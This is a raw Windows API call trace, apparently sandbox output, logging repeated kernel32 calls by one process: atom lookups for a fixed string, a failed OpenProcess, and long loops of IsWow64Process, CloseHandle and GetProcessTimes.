	[0125.438] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.439] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.439] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.439] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.439] CloseHandle (hObject=0x69c) returned 1
	[0125.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.439] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.439] CloseHandle (hObject=0x69c) returned 1
	[0125.439] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.439] CloseHandle (hObject=0x69c) returned 1
	[0125.440] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.440] CloseHandle (hObject=0x69c) returned 1
	[0125.440] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.440] CloseHandle (hObject=0x69c) returned 1
	[0125.440] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.440] CloseHandle (hObject=0x69c) returned 1
	[0125.474] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.474] CloseHandle (hObject=0x69c) returned 1
	[0125.474] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.474] CloseHandle (hObject=0x69c) returned 1
	[0125.474] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.474] CloseHandle (hObject=0x69c) returned 1
	[0125.475] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.475] CloseHandle (hObject=0x69c) returned 1
	[0125.475] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.475] CloseHandle (hObject=0x69c) returned 1
	[0125.475] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.475] CloseHandle (hObject=0x69c) returned 1
	[0125.475] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.475] CloseHandle (hObject=0x69c) returned 1
	[0125.475] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.476] CloseHandle (hObject=0x69c) returned 1
	[0125.476] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.476] CloseHandle (hObject=0x69c) returned 1
	[0125.476] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.476] CloseHandle (hObject=0x69c) returned 1
	[0125.476] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.476] CloseHandle (hObject=0x69c) returned 1
	[0125.476] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.476] CloseHandle (hObject=0x69c) returned 1
	[0125.477] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.477] CloseHandle (hObject=0x69c) returned 1
	[0125.477] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.477] CloseHandle (hObject=0x69c) returned 1
	[0125.477] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.477] CloseHandle (hObject=0x69c) returned 1
	[0125.477] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.477] CloseHandle (hObject=0x69c) returned 1
	[0125.477] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.478] CloseHandle (hObject=0x69c) returned 1
	[0125.478] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.478] CloseHandle (hObject=0x69c) returned 1
	[0125.478] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.478] CloseHandle (hObject=0x69c) returned 1
	[0125.478] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.478] CloseHandle (hObject=0x69c) returned 1
	[0125.478] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.478] CloseHandle (hObject=0x69c) returned 1
	[0125.479] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.479] CloseHandle (hObject=0x69c) returned 1
	[0125.479] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.479] CloseHandle (hObject=0x69c) returned 1
	[0125.479] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.479] CloseHandle (hObject=0x69c) returned 1
	[0125.479] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.479] CloseHandle (hObject=0x69c) returned 1
	[0125.479] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.479] CloseHandle (hObject=0x69c) returned 1
	[0125.480] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.480] CloseHandle (hObject=0x69c) returned 1
	[0125.480] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.480] CloseHandle (hObject=0x69c) returned 1
	[0125.480] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.480] CloseHandle (hObject=0x69c) returned 1
	[0125.480] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.480] CloseHandle (hObject=0x69c) returned 1
	[0125.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.481] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.481] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.481] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.482] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.482] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.482] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.482] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.483] CloseHandle (hObject=0x69c) returned 1
	[0125.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.483] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.483] CloseHandle (hObject=0x69c) returned 1
	[0125.483] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.483] CloseHandle (hObject=0x69c) returned 1
	[0125.483] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.483] CloseHandle (hObject=0x69c) returned 1
	[0125.483] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.483] CloseHandle (hObject=0x69c) returned 1
	[0125.484] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.484] CloseHandle (hObject=0x69c) returned 1
	[0125.516] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.516] CloseHandle (hObject=0x69c) returned 1
	[0125.516] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.516] CloseHandle (hObject=0x69c) returned 1
	[0125.516] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.517] CloseHandle (hObject=0x69c) returned 1
	[0125.517] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.517] CloseHandle (hObject=0x69c) returned 1
	[0125.517] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.517] CloseHandle (hObject=0x69c) returned 1
	[0125.517] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.517] CloseHandle (hObject=0x69c) returned 1
	[0125.517] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.517] CloseHandle (hObject=0x69c) returned 1
	[0125.518] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.518] CloseHandle (hObject=0x69c) returned 1
	[0125.518] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.518] CloseHandle (hObject=0x69c) returned 1
	[0125.518] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.518] CloseHandle (hObject=0x69c) returned 1
	[0125.518] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.518] CloseHandle (hObject=0x69c) returned 1
	[0125.518] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.518] CloseHandle (hObject=0x69c) returned 1
	[0125.519] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.519] CloseHandle (hObject=0x69c) returned 1
	[0125.519] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.519] CloseHandle (hObject=0x69c) returned 1
	[0125.519] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.519] CloseHandle (hObject=0x69c) returned 1
	[0125.519] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.520] CloseHandle (hObject=0x69c) returned 1
	[0125.520] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.520] CloseHandle (hObject=0x69c) returned 1
	[0125.520] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.520] CloseHandle (hObject=0x69c) returned 1
	[0125.521] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.521] CloseHandle (hObject=0x69c) returned 1
	[0125.521] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.521] CloseHandle (hObject=0x69c) returned 1
	[0125.521] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.521] CloseHandle (hObject=0x69c) returned 1
	[0125.521] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.521] CloseHandle (hObject=0x69c) returned 1
	[0125.521] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.521] CloseHandle (hObject=0x69c) returned 1
	[0125.522] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.522] CloseHandle (hObject=0x69c) returned 1
	[0125.522] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.522] CloseHandle (hObject=0x69c) returned 1
	[0125.522] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.522] CloseHandle (hObject=0x69c) returned 1
	[0125.523] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.523] CloseHandle (hObject=0x69c) returned 1
	[0125.523] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.523] CloseHandle (hObject=0x69c) returned 1
	[0125.523] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.524] CloseHandle (hObject=0x69c) returned 1
	[0125.524] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.524] CloseHandle (hObject=0x69c) returned 1
	[0125.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.524] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.524] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.525] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.525] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.525] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.525] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.525] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.525] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.526] CloseHandle (hObject=0x69c) returned 1
	[0125.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.526] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.526] CloseHandle (hObject=0x69c) returned 1
	[0125.526] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.526] CloseHandle (hObject=0x69c) returned 1
	[0125.526] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.526] CloseHandle (hObject=0x69c) returned 1
	[0125.526] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.526] CloseHandle (hObject=0x69c) returned 1
	[0125.527] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.527] CloseHandle (hObject=0x69c) returned 1
	[0125.562] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.562] CloseHandle (hObject=0x69c) returned 1
	[0125.562] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.563] CloseHandle (hObject=0x69c) returned 1
	[0125.563] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.563] CloseHandle (hObject=0x69c) returned 1
	[0125.563] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.563] CloseHandle (hObject=0x69c) returned 1
	[0125.563] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.563] CloseHandle (hObject=0x69c) returned 1
	[0125.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.564] CloseHandle (hObject=0x69c) returned 1
	[0125.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.564] CloseHandle (hObject=0x69c) returned 1
	[0125.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.564] CloseHandle (hObject=0x69c) returned 1
	[0125.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.564] CloseHandle (hObject=0x69c) returned 1
	[0125.564] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.564] CloseHandle (hObject=0x69c) returned 1
	[0125.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.565] CloseHandle (hObject=0x69c) returned 1
	[0125.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.565] CloseHandle (hObject=0x69c) returned 1
	[0125.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.565] CloseHandle (hObject=0x69c) returned 1
	[0125.565] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.565] CloseHandle (hObject=0x69c) returned 1
	[0125.566] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.566] CloseHandle (hObject=0x69c) returned 1
	[0125.566] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.566] CloseHandle (hObject=0x69c) returned 1
	[0125.566] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.566] CloseHandle (hObject=0x69c) returned 1
	[0125.566] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.566] CloseHandle (hObject=0x69c) returned 1
	[0125.567] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.567] CloseHandle (hObject=0x69c) returned 1
	[0125.567] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.567] CloseHandle (hObject=0x69c) returned 1
	[0125.567] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.567] CloseHandle (hObject=0x69c) returned 1
	[0125.567] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.567] CloseHandle (hObject=0x69c) returned 1
	[0125.568] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.568] CloseHandle (hObject=0x69c) returned 1
	[0125.568] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.568] CloseHandle (hObject=0x69c) returned 1
	[0125.568] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.568] CloseHandle (hObject=0x69c) returned 1
	[0125.568] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.568] CloseHandle (hObject=0x69c) returned 1
	[0125.568] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.569] CloseHandle (hObject=0x69c) returned 1
	[0125.569] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.569] CloseHandle (hObject=0x69c) returned 1
	[0125.569] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.569] CloseHandle (hObject=0x69c) returned 1
	[0125.569] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.569] CloseHandle (hObject=0x69c) returned 1
	[0125.570] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.570] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.570] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.570] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.571] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.571] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.571] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.571] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.571] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.571] CloseHandle (hObject=0x69c) returned 1
	[0125.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.572] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.572] CloseHandle (hObject=0x69c) returned 1
	[0125.572] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.572] CloseHandle (hObject=0x69c) returned 1
	[0125.572] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.572] CloseHandle (hObject=0x69c) returned 1
	[0125.573] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.573] CloseHandle (hObject=0x69c) returned 1
	[0125.573] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.573] CloseHandle (hObject=0x69c) returned 1
	[0125.607] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.607] CloseHandle (hObject=0x69c) returned 1
	[0125.607] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.607] CloseHandle (hObject=0x69c) returned 1
	[0125.607] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.607] CloseHandle (hObject=0x69c) returned 1
	[0125.607] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.607] CloseHandle (hObject=0x69c) returned 1
	[0125.608] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.608] CloseHandle (hObject=0x69c) returned 1
	[0125.608] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.608] CloseHandle (hObject=0x69c) returned 1
	[0125.608] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.608] CloseHandle (hObject=0x69c) returned 1
	[0125.608] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.608] CloseHandle (hObject=0x69c) returned 1
	[0125.608] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.608] CloseHandle (hObject=0x69c) returned 1
	[0125.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.609] CloseHandle (hObject=0x69c) returned 1
	[0125.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.609] CloseHandle (hObject=0x69c) returned 1
	[0125.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.609] CloseHandle (hObject=0x69c) returned 1
	[0125.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.609] CloseHandle (hObject=0x69c) returned 1
	[0125.609] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.609] CloseHandle (hObject=0x69c) returned 1
	[0125.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.610] CloseHandle (hObject=0x69c) returned 1
	[0125.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.610] CloseHandle (hObject=0x69c) returned 1
	[0125.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.610] CloseHandle (hObject=0x69c) returned 1
	[0125.610] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.610] CloseHandle (hObject=0x69c) returned 1
	[0125.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.611] CloseHandle (hObject=0x69c) returned 1
	[0125.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.611] CloseHandle (hObject=0x69c) returned 1
	[0125.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.611] CloseHandle (hObject=0x69c) returned 1
	[0125.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.611] CloseHandle (hObject=0x69c) returned 1
	[0125.611] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.611] CloseHandle (hObject=0x69c) returned 1
	[0125.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.612] CloseHandle (hObject=0x69c) returned 1
	[0125.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.612] CloseHandle (hObject=0x69c) returned 1
	[0125.612] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.612] CloseHandle (hObject=0x69c) returned 1
	[0125.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.613] CloseHandle (hObject=0x69c) returned 1
	[0125.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.613] CloseHandle (hObject=0x69c) returned 1
	[0125.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.613] CloseHandle (hObject=0x69c) returned 1
	[0125.613] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.613] CloseHandle (hObject=0x69c) returned 1
	[0125.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.614] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
